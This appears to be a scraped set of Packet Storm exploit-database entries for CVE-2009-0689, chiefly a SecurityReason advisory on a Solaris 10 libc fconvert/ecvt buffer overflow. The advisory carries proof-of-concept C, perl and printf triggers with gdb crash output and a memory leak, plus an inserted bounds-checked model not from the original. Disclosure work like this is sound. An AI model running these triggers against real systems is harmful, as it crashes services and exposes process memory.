6 org.mozilla.camino 0x0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0x0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0x002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16 org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54
17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623
19 org.mozilla.camino 0x001aaaa2 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, nsIContentSink*) + 165
21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90
23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, int, int) + 661
24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 88
26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27 org.mozilla.camino 0x000baf18 nsInputStreamPump::OnStateStop() + 88
28 org.mozilla.camino 0x000bb49d nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133
29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process() + 751
30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21
31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103
32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141
33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88
34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode + 283
35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374
36 com.apple.HIToolbox 0x02d8af4d BlockUntilNextEventMatchingListInMode + 106
37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657
38 com.apple.AppKit 0x05e94630 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795
40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574
41 org.mozilla.camino 0x0000364c main + 196
42 org.mozilla.camino 0x00002f1e _start + 216
43 org.mozilla.camino 0x00002e45 start + 41

Thread 1:
0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10
1 libnspr4.dylib 0x00d3940e poll + 258
2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134
3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll(unsigned int*) + 99
4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run() + 497
5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 2:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74
6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41
7 libnspr4.dylib 0x00d37309 _pt_root + 150
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321
9 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 3:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 4:
0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10
1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73
2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54
3 libSystem.B.dylib 0x01da7095 _pthread_start + 321
4 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 5:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**) + 212
6 org.mozilla.camino 0x000d4b2d nsHostResolver::ThreadFunc(void*) + 123
7 libnspr4.dylib 0x00d37309 _pt_root + 150
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321
9 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 6:
0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10
1 libSystem.B.dylib 0x01da7095 _pthread_start + 321
2 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 7:
0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75
5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145
6 libnspr4.dylib 0x00d37309 _pt_root + 150
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321
8 libSystem.B.dylib 0x01da6f52 thread_start + 34

Thread 0 crashed with X86 Thread State (32-bit):
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037
cr2: 0x7e33d590

--- 3. SecurityReason Note ---
Officially, SREASONRES:20090625 has been confirmed in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c 
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/


`
", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83738/camino-overrun.txt"}, {"lastseen": "2016-12-05T22:21:53", "description": "", "published": "2010-05-22T00:00:00", "type": "packetstorm", "title": "Sun Solaris 10 libc/*convert Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-05-22T00:00:00", "id": "PACKETSTORM:89801", "href": "https://packetstormsecurity.com/files/89801/Sun-Solaris-10-libc-convert-Buffer-Overflow.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 15.04.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/9

Original URL:
http://securityreason.com/achievement_securityalert/86


- --- 0.Description ---
SYNOPSIS
#include <floatingpoint.h>

char *econvert(double value, int ndigit, int *decpt, int *sign, char *buf);
char *fconvert(double value, int ndigit, int *decpt, int *sign, char *buf);
char *gconvert(double value, int ndigit, int trailing, char *buf);
char *seconvert(single *value, int ndigit, int *decpt, int *sign, char *buf);
char *sfconvert(single *value, int ndigit, int *decpt, int *sign, char *buf);
char *sgconvert(single *value, int ndigit, int trailing, char *buf);
char *qeconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf);
char *qfconvert(quadruple *value, int ndigit, int *decpt, int *sign, char *buf);
char *qgconvert(quadruple *value, int ndigit, int trailing, char *buf);

The econvert() function converts the value to a null-terminated string of
ndigit ASCII digits in buf and returns a pointer to buf. buf should contain
at least ndigit+1 characters. The position of the decimal point relative to
the beginning of the string is stored indirectly through decpt. Thus
buf == "314" and *decpt == 1 corresponds to the numerical value 3.14, while
buf == "314" and *decpt == -1 corresponds to the numerical value .0314. If
the sign of the result is negative, the word pointed to by sign is nonzero;
otherwise it is zero. The least significant digit is rounded.

SYNOPSIS
#include <stdlib.h>

char *ecvt(double value, int ndigit, int *restrict decpt, int *restrict sign);
char *fcvt(double value, int ndigit, int *restrict decpt, int *restrict sign);
char *gcvt(double value, int ndigit, char *buf);

DESCRIPTION
The ecvt(), fcvt() and gcvt() functions convert floating-point numbers to
null-terminated strings.


- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---
The problem is in the Sun Solaris 10 libc implementation of these
conversion routines: the caller-supplied digit count (ndigit) is used as
the number of characters to write without any check against the size of
the destination buffer, and for the *cvt(3) wrappers that buffer is a
fixed 1024-byte allocation inside libc. OpenSolaris is not affected.
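To make the failure mode concrete, here is a small portable model of the
pattern, written for this page; it is not code from the advisory or from
Solaris libc. It assumes a 1024-byte conversion buffer, which matches the
calloc(1,1024) in the ecvt.c excerpt quoted later in this advisory, and it
produces digits with snprintf("%.*e") instead of Solaris's
double_to_decimal(), which is this example's own simplification. The sign
and decpt results follow the econvert() contract from the synopsis above.
The bounds-checked version refuses a digit count the buffer cannot hold
instead of writing past it, which is exactly the check the Solaris code
lacks.

```c
/* Added example (not from the advisory or from Solaris libc): a model of the
 * ecvt()/econvert() contract with the bounds check the Solaris code lacks.
 * Assumption: the conversion buffer is 1024 bytes, as in the calloc(1,1024)
 * in the ecvt.c excerpt quoted in the advisory. Digit generation uses
 * snprintf("%.*e") instead of Solaris's double_to_decimal(). */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EFCVT_BUFSIZE 1024   /* size of the static *cvt() buffer being modelled */

/* Would econvert(arg, ndigits, ..., buf) with a buffer of bufsz bytes write
 * past its end? It stores ndigits digits plus the terminating NUL, so any
 * ndigits >= bufsz overflows; a negative ndigits is rejected outright. */
int econvert_overflows(int ndigits, size_t bufsz)
{
    return ndigits < 0 || (size_t)ndigits >= bufsz;
}

/* Bounds-checked econvert(): writes exactly ndigits significant decimal
 * digits of |value| into buf (ecvt style: no decimal point; its position is
 * returned via *decpt, so "314" with *decpt == 1 means 3.14 and *decpt == -1
 * means .0314). Returns 0 on success, -1 with errno set on refusal. */
int safe_econvert(double value, int ndigits, int *decpt, int *sign,
                  char *buf, size_t bufsz)
{
    if (ndigits < 1 || econvert_overflows(ndigits, bufsz)) {
        errno = ERANGE;          /* the vulnerable code would overflow here */
        return -1;
    }
    if (value != value || value - value != 0) {
        errno = EDOM;            /* NaN or infinity: no decimal digits */
        return -1;
    }
    *sign = value < 0 ? 1 : 0;   /* simplification: -0.0 reports as positive */
    if (value < 0)
        value = -value;

    /* "%.*e" yields d.ddd...e[+-]XX; the fraction has ndigits-1 digits. */
    size_t tmpsz = (size_t)ndigits + 16;
    char *tmp = malloc(tmpsz);
    if (tmp == NULL)
        return -1;
    int n = snprintf(tmp, tmpsz, "%.*e", ndigits - 1, value);
    if (n < 0 || (size_t)n >= tmpsz) {
        free(tmp);
        errno = ERANGE;
        return -1;
    }

    /* Copy the mantissa digits, dropping the '.', then read the exponent. */
    size_t j = 0;
    const char *p = tmp;
    for (; *p != '\0' && *p != 'e'; p++)
        if (*p != '.')
            buf[j++] = *p;
    buf[j] = '\0';
    int exp10 = (*p == 'e') ? atoi(p + 1) : 0;
    *decpt = exp10 + 1;          /* d.ddd x 10^e  ==  .dddd x 10^(e+1) */
    free(tmp);
    return 0;
}

/* Self-check helper: converts v with nd digits into a 1024-byte buffer and
 * reports whether the result matches the expected digit string and decpt. */
int econvert_matches(double v, int nd, const char *want, int want_decpt)
{
    char buf[EFCVT_BUFSIZE];
    int decpt = 0, sign = 0;
    if (safe_econvert(v, nd, &decpt, &sign, buf, sizeof buf) != 0)
        return 0;
    return strcmp(buf, want) == 0 && decpt == want_decpt;
}

int main(void)
{
    char buf[EFCVT_BUFSIZE];
    int decpt, sign;
    /* 3405 is the digit count the advisory uses to leak memory via ecvt(). */
    if (safe_econvert(1.0, 3405, &decpt, &sign, buf, sizeof buf) != 0)
        printf("ndigits=3405 refused: %s\n", strerror(errno));
    if (safe_econvert(3.14, 3, &decpt, &sign, buf, sizeof buf) == 0)
        printf("digits=%s decpt=%d sign=%d\n", buf, decpt, sign);
    return 0;
}
```

The digit counts the advisory feeds to ecvt() (3405, 3500, 4000) are all
refused by econvert_overflows(); the 512-digit fconvert() case is a
different crash site inside libc and is not modelled here.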


PoC:
- ---
# cat jaja.c
#include <stdio.h>
#include <stdlib.h>
#include <floatingpoint.h>   /* fconvert() prototype, per the synopsis above */

int main(int argc, char *argv[])
{
    char number[10000];      /* destination buffer, far larger than any ndigit used here */
    int a, b;                /* decpt and sign, filled in by fconvert() */

    if (argc < 2) {
        fprintf(stderr, "usage: %s ndigit\n", argv[0]);
        return 1;
    }
    /* Convert 0.0 with a caller-chosen number of digits after the point. */
    printf("%s", fconvert((double)0, atoi(argv[1]), &a, &b, number));
    return 0;
}

# /usr/local/bin/gcc -o jaja jaja.c
# ./jaja 16
0000000000000000#
# ./jaja 512
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000#
- ---

ndigit = 512 works here only because the value being converted is
(double)0. The same call with a non-zero value crashes.

So let's use a non-zero value in jaja2.c:

PoC:
- ---
# cat jaja2.c
#include <stdio.h>
#include <stdlib.h>
#include <floatingpoint.h>   /* fconvert() prototype, per the synopsis above */

int main(int argc, char *argv[])
{
    char number[10000];
    int a, b;

    if (argc < 2) {
        fprintf(stderr, "usage: %s ndigit\n", argv[0]);
        return 1;
    }
    /* Same as jaja.c, but converting 1.0 instead of 0.0. */
    printf("%s", fconvert((double)1, atoi(argv[1]), &a, &b, number));
    return 0;
}

# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeeab05c in fconvert () from /lib/libc.so.1
(gdb) i r
eax            0x8047240   134509120
ecx            0x3250      12880
edx            0x8048000   134512640
ebx            0xfef9e000  -17178624
esp            0x8044b38   0x8044b38
ebp            0x8044d68   0x8044d68
esi            0x200       512
edi            0x0         0
eip            0xfeeab05c  0xfeeab05c <fconvert+163>
eflags         0x10206     [ PF IF RF ]
cs             0x3b        59
ss             0x43        67
ds             0x43        67
es             0x43        67
fs             0x0         0
gs             0x1c3       451
(gdb) x/x $edx
0x8048000:      Cannot access memory at address 0x8048000
(gdb)
- ---

Note esi = 0x200 = 512, our ndigit, and edx = 0x8048000, an unmapped
address that fconvert+163 is writing to (the faulting instruction there is
mov %al,(%edx), as the printf(1) session further down shows).

The same result can be obtained with perl(1):

PoC perl:
- ---
#!/usr/local/bin/perl
printf "%.512f", 1;
# perl pss.pl
Segmentation Fault - core dumped
# /usr/local/bin/gdb -q perl
(no debugging symbols found)
(gdb) r pss.pl
Starting program: /usr/bin/perl pss.pl
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfed7b05c in fconvert () from /lib/libc.so.1
- ---

Functions like *cvt(3) are also affected. Let's check ecvt(3):

PoC:
- ---
# cat jaja3.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int a, b;                /* decpt and sign, filled in by ecvt() */

    if (argc < 2) {
        fprintf(stderr, "usage: %s ndigit\n", argv[0]);
        return 1;
    }
    /* ecvt() writes into libc's own static buffer; the caller supplies none. */
    printf("%s", ecvt((double)1, atoi(argv[1]), &a, &b));
    return 0;
}

# ./jaja3 3405
%Y....[some_part_of_memory]
#
- ---

This looks like a memory disclosure.

Now a bigger value:

PoC:
- ---
# ./jaja3 3500
Segmentation fault (core dumped)
- ---

Time to debug it:

PoC:
- ---
# /usr/local/bin/gdb -q jaja3
(no debugging symbols found)
(gdb)
(gdb) r 4000
Starting program: /jaja3 4000
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeeaaf72 in econvert () from /lib/libc.so.1
(gdb) i r
eax            0xf00       3840
ecx            0xdac       3500
edx            0xfef929ab  -17225301
ebx            0xfef9e000  -17178624
esp            0x8047230   0x8047230
ebp            0x8047460   0x8047460
esi            0xfa0       4000
edi            0x1         1
eip            0xfeeaaf72  0xfeeaaf72 <econvert+144>
eflags         0x10287     [ CF PF SF IF RF ]
cs             0x3b        59
ss             0x43        67
ds             0x43        67
es             0x43        67
fs             0x0         0
gs             0x1c3       451
- ---

The faulting eip varies; it is not always econvert+144:

PoC:
- ---
(gdb) r 3501111111
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /jaja3 3501111111
[New LWP 1 ]
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeeaaf89 in econvert () from /lib/libc.so.1
(gdb) i r
eax            0xcfa7d347  -811084985
ecx            0x0         0
edx            0x1         1
ebx            0xfef9e000  -17178624
esp            0x8047230   0x8047230
ebp            0x8047460   0x8047460
esi            0xd0aeb747  -793856185
edi            0x1         1
eip            0xfeeaaf89  0xfeeaaf89 <econvert+167>
eflags         0x10287     [ CF PF SF IF RF ]
cs             0x3b        59
ss             0x43        67
ds             0x43        67
es             0x43        67
fs             0x0         0
gs             0x1c3       451
- ---

(Here atoi() has wrapped 3501111111 to -793856185, the value in esi, so a
negative ndigits reaches econvert() as well.)

The crash does not even have to be inside econvert(). The behaviour is also
visible in the printf(1) program, with a different crash site depending on
the format and the value:

PoC:
- ---
# /usr/local/bin/gdb -q printf
(no debugging symbols found)
(gdb) r %.011111f 0
Starting program: /usr/bin/printf %.011111f 0
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeea48da in _malloc_unlocked () from /lib/libc.so.1
(gdb) r %.0111111f 0
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /usr/bin/printf %.0111111f 0
[New LWP 1 ]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfee852ab in memcpy () from /lib/libc.so.1

(gdb) r %.0111111f 1
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /usr/bin/printf %.0111111f 1
[New LWP 1 ]
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfee8b05c in fconvert () from /lib/libc.so.1
(gdb) x/i $eip
0xfee8b05c <fconvert+163>: mov %al,(%edx)
- ---

For printf(1) we have seen eip end up in:
- - fconvert+163 (the same as jaja2 with ndigit 512)
- - memcpy
- - _malloc_unlocked
- - others

This bug is very similar to CVE-2009-0689, but we found no part of the
gdtoa license in the Oracle license, and the behaviour in the examples
above differs from that of CVE-2009-0689.

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/ecvt.c

- ---
34 char *
35 ecvt(arg, ndigits, decpt, sign)
36 double arg;
37 int ndigits, *decpt, *sign;
38 {
39 if (efcvtbuffer == NULL)
40 efcvtbuffer = (char *)calloc(1,1024);
41 return econvert(arg, ndigits, decpt, sign, efcvtbuffer);
42 }
43
- ---

efcvtbuffer is a fixed 1024-byte heap allocation, and ndigits, which the
caller controls, is passed straight through and can be larger than that
buffer.

Now econvert():

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/econvert.c

- ---
34 econvert(arg, ndigits, decpt, sign, buf)
35 double arg;
36 int ndigits, *decpt, *sign;
37 char *buf;
38 {
39 decimal_mode dm;
40 decimal_record dr;
41 fp_exception_field_type ef;
42 int i;
43 char *pc;
44 int nc;
45
46 dm.rd = fp_direction; /* Rounding direction. */
47 dm.df = floating_form; /* E format. */
48 dm.ndigits = ndigits; /* Number of significant digits. */
49 double_to_decimal(&arg, &dm, &dr, &ef);
50 *sign = dr.sign;
51 switch (dr.fpclass) {
52 case fp_normal:
53 case fp_subnormal:
54 *decpt = dr.exponent + ndigits;
55 for (i = 0; i < ndigits; i++)
56 buf[i] = dr.ds[i];
57 buf[ndigits] = 0;
58 break;
- ---

Lines 55 and 56 are the overflow: ndigits bytes are copied into buf, and a
terminator is written at buf[ndigits], with no check against the size of
buf. For ecvt() that buffer is the 1024-byte efcvtbuffer.

We do not know why, but OpenSolaris carries a fix for this while the
shipping SunOS libc remains vulnerable.


- --- 2. Fix ---
Sun bug 5105920

OpenSolaris has removed this issue without realizing the security nature
of the bug.


- --- 3. Greets ---
sp3x Infospec pi3


- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkv2fz0ACgkQpiCeOKaYa9aStgCcCZb2uawbEXy9yJIjfCAPRQFS
B/cAnRGVewtJnM/CBuZk6PHKp9LJrf2q
=AMPU
-----END PGP SIGNATURE-----

`
", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/89801/solaris10libc-overflow.txt"}, {"lastseen": "2016-12-05T22:13:29", "description": "", "published": "2010-01-09T00:00:00", "type": "packetstorm", "title": "Matlab R2009b Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-09T00:00:00", "id": "PACKETSTORM:84946", "href": "https://packetstormsecurity.com/files/84946/Matlab-R2009b-Array-Overrun.html", "sourceData": "`[ Matlab R2009b Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Matlab R2009b

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/80


--- 0.Description ---
MATLAB is a numerical computing environment and fourth generation
programming language. Developed by The MathWorks, MATLAB allows matrix
manipulation, plotting of functions and data, implementation of
algorithms, creation of user interfaces, and interfacing with programs
in other languages. Although it is numeric only, an optional toolbox
